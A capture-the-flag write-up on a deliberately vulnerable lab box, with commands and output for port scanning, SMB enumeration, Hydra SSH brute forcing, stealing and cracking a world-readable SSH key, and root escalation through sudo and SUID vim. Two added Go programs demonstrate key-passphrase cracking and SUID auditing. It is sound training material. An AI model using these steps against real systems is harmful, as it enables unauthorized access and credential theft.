Basic pentesting
It is a guided CTF: a basic introduction to classic pentesting (simplified).
Enumeration
nmap
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:45:cb:be:4a:8b:71:f8:e9:31:42:ae:ff:f8:45:e4 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDZXasCfWSXQ9lYiKbTNkPs0T+wFym2lZy229LllhY6iDLrjm7LIkhCcrlgnJQtLxl5NPhlHNVmwhlkcPPiAHwluhMVE5xKihQj3i+Ucx2IwiFvfmCz4AKsWlR6N8IZe55Ltw0lcH9ykuKZddg81X85EVsNbMacJNjjyxAtwQmJt1F5kB1B2ixgjLLOyNWafC5g1h6XbEgB2wiSRJ5UA8rOZaF28YcDVo0MQhsKpQG/5oPmQUsIeJTUA/XkoWCjvXZqHwv8XInQLQu3VXKgv735G+CJaKzplh7FZyXju8ViDSAY8gdhqpJommYxzqu9s1M31cmFg2fT5V1z9s4DP/vd
| 256 09:b9:b9:1c:e0:bf:0e:1c:6f:7f:fe:8e:5f:20:1b:ce (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBP0SXJpgwPf/e9AT9ri/dlAnkob4PqzMjl2Q9lZIVIXeEFJ9sfRkC+tgSjk9PwK0DUO3JU27pmtAkDL4Mtv9eZw=
| 256 a5:68:2b:22:5f:98:4a:62:21:3d:a2:e2:c5:a9:f7:c2 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAzy8ZacWXbPGeqtuiJCnPP0LYZYZlMj5D1ZY9ldg1wU
80/tcp open http syn-ack Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html).
139/tcp open netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn syn-ack Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
8009/tcp open ajp13? syn-ack
| ajp-methods:
|_ Supported methods: GET HEAD POST OPTIONS
8080/tcp open http-proxy syn-ack
|_http-favicon: Apache Tomcat
|_http-open-proxy: Proxy might be redirecting requests
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| fingerprint-strings:
| LPDString:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 2243
| Date: Sat, 19 Feb 2022 23:43:36 GMT
| Connection: close
| <!doctype html><html lang="en"><head><title>HTTP Status 400 – Bad Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><bod
| SMBProgNeg:
| HTTP/1.1 400
| Content-Type: text/html;charset=utf-8
| Content-Language: en
| Content-Length: 2243
| Date: Sat, 19 Feb 2022 23:43:30 GMT
| Connection: close
|_ <!doctype html><html lang="en"><head><title>HTTP Status 400 – Bad Request</title><style type="text/css">h1 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:22px;} h2 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:16px;} h3 {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;font-size:14px;} body {font-family:Tahoma,Arial,sans-serif;color:black;background-color:white;} b {font-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76;} p {font-family:Tahoma,Arial,sans-serif;background:white;color:black;font-size:12px;} a {color:black;} a.name {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><bod
|_http-title: Apache Tomcat/9.0.7
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8080-TCP:V=7.92%I=7%D=2/20%Time=62117FF8%P=x86_64-pc-linux-gnu%r(SM
SF:BProgNeg,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charse
SF:t=utf-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\
SF:x20Sat,\x2019\x20Feb\x202022\x2023:43:30\x20GMT\r\nConnection:\x20close
SF:\r\n\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Sta
SF:tus\x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"te
SF:xt/css\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;backgro
SF:und-color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,s
SF:ans-serif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x
SF:20{font-family:Tahoma,Arial,sans-serif;color:white;background-color:#52
SF:5D76;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;c
SF:olor:black;background-color:white;}\x20b\x20{font-family:Tahoma,Arial,s
SF:ans-serif;color:white;background-color:#525D76;}\x20p\x20{font-family:T
SF:ahoma,Arial,sans-serif;background:white;color:black;font-size:12px;}\x2
SF:0a\x20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:
SF:1px;background-color:#525D76;border:none;}</style></head><bod")%r(LPDSt
SF:ring,95F,"HTTP/1\.1\x20400\x20\r\nContent-Type:\x20text/html;charset=ut
SF:f-8\r\nContent-Language:\x20en\r\nContent-Length:\x202243\r\nDate:\x20S
SF:at,\x2019\x20Feb\x202022\x2023:43:36\x20GMT\r\nConnection:\x20close\r\n
SF:\r\n<!doctype\x20html><html\x20lang=\"en\"><head><title>HTTP\x20Status\
SF:x20400\x20\xe2\x80\x93\x20Bad\x20Request</title><style\x20type=\"text/c
SF:ss\">h1\x20{font-family:Tahoma,Arial,sans-serif;color:white;background-
SF:color:#525D76;font-size:22px;}\x20h2\x20{font-family:Tahoma,Arial,sans-
SF:serif;color:white;background-color:#525D76;font-size:16px;}\x20h3\x20{f
SF:ont-family:Tahoma,Arial,sans-serif;color:white;background-color:#525D76
SF:;font-size:14px;}\x20body\x20{font-family:Tahoma,Arial,sans-serif;color
SF::black;background-color:white;}\x20b\x20{font-family:Tahoma,Arial,sans-
SF:serif;color:white;background-color:#525D76;}\x20p\x20{font-family:Tahom
SF:a,Arial,sans-serif;background:white;color:black;font-size:12px;}\x20a\x
SF:20{color:black;}\x20a\.name\x20{color:black;}\x20\.line\x20{height:1px;
SF:background-color:#525D76;border:none;}</style></head><bod");
Service Info: Host: BASIC2; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 30040/tcp): CLEAN (Couldn't connect)
| Check 2 (port 44589/tcp): CLEAN (Couldn't connect)
| Check 3 (port 62922/udp): CLEAN (Timeout)
| Check 4 (port 60267/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: mean: 1h42m50s, deviation: 2h53m13s, median: 2m49s
| smb2-time:
| date: 2022-02-19T23:44:03
|_ start_date: N/A
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: basic2
| NetBIOS computer name: BASIC2\x00
| Domain name: \x00
| FQDN: basic2
|_ System time: 2022-02-19T18:44:04-05:00
| nbstat: NetBIOS name: BASIC2, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| Names:
| BASIC2<00> Flags: <unique><active>
| BASIC2<03> Flags: <unique><active>
| BASIC2<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
|_ 00 00 00 00 00 00 00 00 00 00 00 00 00 00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
Gobuster
/.hta (Status: 403) [Size: 291]
/.htaccess (Status: 403) [Size: 296]
/.htpasswd (Status: 403) [Size: 296]
/development (Status: 301) [Size: 318] [--> http://10.10.106.77/development/]
/index.html (Status: 200) [Size: 158]
/server-status (Status: 403) [Size: 300]
On the website (always check the source code) they tell you to look at the /development dir:
<html>
<h1>Undergoing maintenance</h1>
<h4>Please check back later</h4>
<!-- Check our dev note section if you need to know what to work on. -->
</html>
The notes in /development mention something about Struts and that a user "J" has weak credentials.
SMB is also open, so let's enumerate that (smbclient asks for a password; just press Enter, or pass -N, to get a null session):
└──╼ $smbclient -L 10.10.106.77
Enter WORKGROUP\mynibba's password:
Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)
There is an Anonymous share; let's check it:
└──╼ $smbclient //10.10.106.77/Anonymous
Enter WORKGROUP\mynibba's password:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Apr 19 18:31:20 2018
.. D 0 Thu Apr 19 18:13:06 2018
staff.txt N 173 Thu Apr 19 18:29:55 2018
14318640 blocks of size 1024. 11094440 blocks available
smb: \> get staff.txt
getting file \staff.txt of size 173 as staff.txt (0,3 KiloBytes/sec) (average 0,3 KiloBytes/sec)
staff.txt uses their full first names, so now we know "J" and "K" are jan and kay respectively.
As we remember, jan has a weak password and SSH is open. Hydra eventually cracks it. It takes a needlessly long time; as Hydra itself warns, sshd limits parallel sessions, so -t 4 is usually the better choice:
└──╼ $hydra -l jan -P /usr/share/wordlists/rockyou.txt 10.10.106.77 ssh
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-02-20 01:20:08
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://10.10.106.77:22/
[STATUS] 182.00 tries/min, 182 tries in 00:01h, 14344223 to do in 1313:35h, 16 active
[STATUS] 116.67 tries/min, 350 tries in 00:03h, 14344055 to do in 2049:10h, 16 active
[22][ssh] host: 10.10.106.77 login: jan password: armando
1 of 1 target successfully completed, 1 valid password found
Lame password! We have access now.
There is not much in jan's home folder.
Exploitation + Privilege escalation
We know kay is a user too, so let's check her home folder:
jan@basic2:/home/kay$ ls -al
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
-rw------- 1 kay kay 57 Apr 23 2018 pass.bak
Look at the permissions on the .ssh folder:
jan@basic2:/home/kay/.ssh$ ls -al
total 20
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 ..
-rw-rw-r-- 1 kay kay 771 Apr 23 2018 authorized_keys
-rw-r--r-- 1 kay kay 3326 Apr 19 2018 id_rsa
-rw-r--r-- 1 kay kay 771 Apr 19 2018 id_rsa.pub
The private key is world-readable (0644), so anyone on the box can copy it. Copy-paste it to the attacking machine.
Don't forget to fix the permissions on your copy (ssh refuses a key that is group- or world-readable), then try to get access:
└──╼ $chmod 600 id_rsa
└──╼ $ssh kay@10.10.106.77 -i id_rsa
Enter passphrase for key 'id_rsa':
Oops, the key has a passphrase. Maybe we can brute-force it with john:
└──╼ $python2 /usr/share/john/ssh2john.py id_rsa > id_john
└──╼ $john -w=/usr/share/wordlists/rockyou.txt id_john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
beeswax (id_rsa)
1g 0:00:00:07 DONE (2022-02-20 01:44) 0.1406g/s 2017Kp/s 2017Kc/s 2017KC/s a6_123..*7¡Vamos!
Session completed
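What ssh2john and john are doing here, as an added example that is not part of the original writeup: the Go program below builds its own passphrase-protected key in the same legacy OpenSSL PEM format john identified (MD5 key derivation, AES, "cost 0", no iteration count, no integrity check), then runs a wordlist against it. The key, the passphrase "beeswax" and the mini wordlist are constructed for the demo; Go's stdlib legacy-PEM helpers are used (they are deprecated precisely because the format is weak). Note the second check after decryption: the format has no MAC, so a wrong passphrase occasionally passes the padding check, which is the "false positives" john warns about.

```go
package main

import (
	"crypto/rand"
	"crypto/rsa"
	"crypto/x509"
	"encoding/pem"
	"errors"
	"fmt"
)

// makeEncryptedKey is constructed sample input standing in for kay's id_rsa:
// an RSA key in the legacy OpenSSL PEM format ("Proc-Type: 4,ENCRYPTED",
// DEK-Info with an MD5-derived AES-128-CBC key). That is the "MD5/AES"
// format john reported: one MD5 per guess, no rounds, no integrity check.
func makeEncryptedKey(passphrase string) ([]byte, error) {
	priv, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return nil, err
	}
	der := x509.MarshalPKCS1PrivateKey(priv)
	// EncryptPEMBlock is deprecated because this format is weak, which is
	// exactly why it is the right tool for reproducing it here.
	block, err := x509.EncryptPEMBlock(rand.Reader, "RSA PRIVATE KEY", der,
		[]byte(passphrase), x509.PEMCipherAES128)
	if err != nil {
		return nil, err
	}
	return pem.EncodeToMemory(block), nil
}

// crackPassphrase does what ssh2john + john do for this format: derive the
// key from each candidate, decrypt, and keep going until the plaintext is
// really a private key. It returns the passphrase and how many guesses it took.
func crackPassphrase(pemBytes []byte, candidates []string) (string, int, error) {
	block, _ := pem.Decode(pemBytes)
	if block == nil {
		return "", 0, errors.New("no PEM block found")
	}
	if !x509.IsEncryptedPEMBlock(block) {
		return "", 0, errors.New("key is not passphrase-protected")
	}
	for i, cand := range candidates {
		der, err := x509.DecryptPEMBlock(block, []byte(cand))
		if err != nil {
			continue // CBC padding check failed: wrong passphrase
		}
		// Padding passes by chance for roughly 1 in 256 wrong guesses (the
		// "false positives" john mentions); parsing the DER settles it.
		if _, err := x509.ParsePKCS1PrivateKey(der); err != nil {
			continue
		}
		return cand, i + 1, nil
	}
	return "", len(candidates), errors.New("passphrase not in wordlist")
}

func main() {
	key, err := makeEncryptedKey("beeswax") // passphrase from the writeup, set here on purpose
	if err != nil {
		panic(err)
	}
	// Constructed mini wordlist; rockyou.txt would be read line by line instead.
	wordlist := []string{"123456", "password", "armando", "letmein", "beeswax", "qwerty"}
	found, tried, err := crackPassphrase(key, wordlist)
	if err != nil {
		fmt.Println("not found:", err)
		return
	}
	fmt.Printf("passphrase %q found after %d candidates\n", found, tried)
}
```

For defenders the lesson is the format, not the wordlist: ssh-keygen -o (the default since OpenSSH 7.8) writes the newer OpenSSH private-key format with a bcrypt KDF, and -a raises its round count, so each guess costs orders of magnitude more than one MD5. The code above does not handle that format at all, which is rather the point.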
Kay is like jan, but with extra steps.
Now we can read the suspicious file in kay's folder:
kay@basic2:~$ cat pass.bak
heresareallystrongpasswordthatfollowsthepasswordpolicy$$
Kay has trust issues! A genuinely strong password is worth little when it sits in a plaintext pass.bak in the home directory.
Technically the room ends here!
But let's go a bit further:
Extra:
Using sudo with that long password, we can see kay may run any command as any user, which makes her effectively root:
kay@basic2:~$ sudo -l
[sudo] password for kay:
Matching Defaults entries for kay on basic2:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User kay may run the following commands on basic2:
(ALL : ALL) ALL
Is there any flag?
kay@basic2:~$ sudo cat /root/flag.txt
Congratulations! You've completed this challenge. There are two ways (that I'm aware of) to gain
a shell, and two ways to privesc. I encourage you to find them all!
If you're in the target audience (newcomers to pentesting), I hope you learned something. A few
takeaways from this challenge should be that every little bit of information you can find can be
valuable, but sometimes you'll need to find several different pieces of information and combine
them to make them useful. Enumeration is key! Also, sometimes it's not as easy as just finding
an obviously outdated, vulnerable service right away with a port scan (unlike the first entry
in this series). Usually you'll have to dig deeper to find things that aren't as obvious, and
therefore might've been overlooked by administrators.
Thanks for taking the time to solve this VM. If you choose to create a writeup, I hope you'll send
me a link! I can be reached at [email protected]. If you've got questions or feedback, please reach
out to me.
Happy hacking!
Or we could also just become root:
kay@basic2:~$ sudo su root
root@basic2:/home/kay# id
uid=0(root) gid=0(root) groups=0(root)
root@basic2:/home/kay#
Anyway... cool flag!
See? They say there is another way to privesc (I knew it).
Let's switch back to kay and find it. After sudo, I usually look for SUID binaries (adding -type f to the find would keep directories out of the list):
root@basic2:/home/jan# exit
exit
kay@basic2:~$ find / -perm -u=s 2>/dev/null
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/bin/vim.basic
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/chsh
/usr/bin/newgidmap
/usr/bin/at
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/passwd
/bin/su
/bin/ntfs-3g
/bin/ping6
/bin/umount
/bin/fusermount
/bin/mount
/bin/ping
I see possibilities! /usr/bin/vim.basic is SUID root, and vim can spawn a shell (:!sh) or read and write arbitrary files (for example /etc/shadow), so that is the second privesc path.
Now, remember that Struts 2.5.12 kay was talking about?
Yeah, me neither.
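The triage step that follows the find above, as an added example that is not part of the original writeup: a small Go program that walks a tree, reports setuid/setgid regular files (a bit wider than -perm -u=s, which only matches setuid), and flags anything not on a baseline of binaries the distro is expected to ship with the bit set. The baseline map is constructed here from the find output on this box minus vim.basic; on a real engagement it would come from a clean reference host or the package database, never from the suspect machine. Go's stdlib is used so it runs offline; the file name and the posixMode helper are this example's own.

```go
package main

import (
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
	"sort"
)

// Setuid binaries a stock Ubuntu 16.04 install is expected to carry.
// Constructed for this example from the find output in the writeup, with
// vim.basic left out; a real baseline comes from a clean reference host.
var baseline = map[string]bool{
	"/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic":      true,
	"/usr/lib/policykit-1/polkit-agent-helper-1":      true,
	"/usr/lib/eject/dmcrypt-get-device":               true,
	"/usr/lib/snapd/snap-confine":                     true,
	"/usr/lib/openssh/ssh-keysign":                    true,
	"/usr/lib/dbus-1.0/dbus-daemon-launch-helper":     true,
	"/usr/bin/pkexec": true, "/usr/bin/newgrp": true, "/usr/bin/chfn": true,
	"/usr/bin/sudo": true, "/usr/bin/chsh": true, "/usr/bin/newgidmap": true,
	"/usr/bin/at": true, "/usr/bin/gpasswd": true, "/usr/bin/newuidmap": true,
	"/usr/bin/passwd": true, "/bin/su": true, "/bin/ntfs-3g": true,
	"/bin/ping6": true, "/bin/umount": true, "/bin/fusermount": true,
	"/bin/mount": true, "/bin/ping": true,
}

// posixMode turns the mode you would hand to chmod (e.g. 0o4755) into Go's
// FileMode, where setuid/setgid live in separate flag bits, not in 04000/02000.
func posixMode(m uint32) fs.FileMode {
	mode := fs.FileMode(m & 0o777)
	if m&0o4000 != 0 {
		mode |= fs.ModeSetuid
	}
	if m&0o2000 != 0 {
		mode |= fs.ModeSetgid
	}
	return mode
}

type Finding struct {
	Path     string
	Setuid   bool
	Setgid   bool
	Expected bool // listed in the baseline
}

// classify reports whether a regular file carries setuid/setgid and whether
// it is on the baseline. Directories and symlinks are ignored: the bit means
// something else on a directory, and a symlink's own mode is meaningless.
func classify(path string, mode fs.FileMode, baseline map[string]bool) (Finding, bool) {
	if !mode.IsRegular() || mode&(fs.ModeSetuid|fs.ModeSetgid) == 0 {
		return Finding{}, false
	}
	return Finding{
		Path:     path,
		Setuid:   mode&fs.ModeSetuid != 0,
		Setgid:   mode&fs.ModeSetgid != 0,
		Expected: baseline[path],
	}, true
}

// scan walks root and returns every setuid/setgid regular file, unexpected
// ones first. Unreadable directories are skipped, like 2>/dev/null did above.
func scan(root string, baseline map[string]bool) ([]Finding, error) {
	var out []Finding
	err := filepath.WalkDir(root, func(path string, d fs.DirEntry, err error) error {
		if err != nil {
			return nil
		}
		info, err := d.Info() // Lstat semantics: symlinks are not followed
		if err != nil {
			return nil
		}
		if f, ok := classify(path, info.Mode(), baseline); ok {
			out = append(out, f)
		}
		return nil
	})
	sort.SliceStable(out, func(i, j int) bool { return !out[i].Expected && out[j].Expected })
	return out, err
}

func main() {
	root := "/"
	if len(os.Args) > 1 {
		root = os.Args[1]
	}
	findings, err := scan(root, baseline)
	if err != nil {
		fmt.Println("walk error:", err)
	}
	for _, f := range findings {
		tag := "expected"
		if !f.Expected {
			tag = "REVIEW" // on this box that would be /usr/bin/vim.basic
		}
		fmt.Printf("%-8s setuid=%-5v setgid=%-5v %s\n", tag, f.Setuid, f.Setgid, f.Path)
	}
}
```

Run it as the low-privileged user with no arguments to walk the whole filesystem; anything tagged REVIEW is either a packaging quirk or, as with vim.basic here, the privesc path. The same classify logic works as a detection on the defensive side when fed a file-integrity baseline instead of the attacker's expectations.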